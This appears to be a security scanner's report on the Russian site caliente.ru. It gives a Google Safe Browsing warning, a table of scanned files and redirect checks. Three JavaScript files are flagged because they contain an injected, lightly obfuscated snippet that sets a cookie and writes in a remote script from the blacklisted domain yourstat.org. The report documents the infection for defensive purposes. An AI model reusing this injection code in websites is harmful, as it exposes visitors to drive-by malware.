Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=caliente.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://caliente.ru/ | 200 OK Content-Length: 4734 Content-Type: text/html | clean |
http://caliente.ru/media/system/js/caption.js | 200 OK Content-Length: 2292 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1279 bytes skipped]... on = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} Antivirus reports:
| ||
http://caliente.ru/templates/calienteshoes_home/script.js | 200 OK Content-Length: 15044 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: yourstat.org ...[3969 bytes skipped]... (function() { artButtonsSetupJsHover("button"); artButtonsSetupJsHover("readon"); artButtonsSetupJsHover("readmore"); });function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} | ||
http://caliente.ru/index.php?option=com_content&view=article&id=6&Itemid=1 | 200 OK Content-Length: 8322 Content-Type: text/html | clean |
http://caliente.ru/templates/calienteshoes/script.js | 200 OK Content-Length: 15044 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: yourstat.org ...[3969 bytes skipped]... (function() { artButtonsSetupJsHover("button"); artButtonsSetupJsHover("readon"); artButtonsSetupJsHover("readmore"); });function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');} | ||
http://caliente.ru/index.php?option=com_content&view=article&id=2&Itemid=2 | 200 OK Content-Length: 6811 Content-Type: text/html | clean |
http://caliente.ru/index.php?option=com_content&view=article&id=3&Itemid=3 | 200 OK Content-Length: 4528 Content-Type: text/html | clean |
http://caliente.ru/index.php?option=com_content&view=article&id=7&Itemid=7 | 200 OK Content-Length: 5589 Content-Type: text/html | clean |
http://caliente.ru/index.php?option=com_content&view=article&id=4&Itemid=4 | 200 OK Content-Length: 5367 Content-Type: text/html | clean |
http://caliente.ru/index.php?option=com_content&view=article&id=5&Itemid=5 | 200 OK Content-Length: 5836 Content-Type: text/html | clean |
http://caliente.ru/images/anketa_caliente.doc | 200 OK Content-Length: 26112 Content-Type: application/msword | clean |
http://caliente.ru/test404page.js | 404 Not Found Content-Length: 1734 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: caliente.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 00:17:34 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Length: 4734
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 12 Jan 2015 00:17:34 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 25150362e3bc87ba33fe42bd433e3cb9=bd3b5627570e9b98cc51242124b78cc6; path=/
...4734 bytes of data.
GET / HTTP/1.1
Host: caliente.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 00:17:34 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Length: 4734
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 12 Jan 2015 00:17:34 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 25150362e3bc87ba33fe42bd433e3cb9=bd3b5627570e9b98cc51242124b78cc6; path=/
...4734 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: caliente.ru
Referer: http://www.google.com/search?q=caliente.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: caliente.ru
Referer: http://www.google.com/search?q=caliente.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.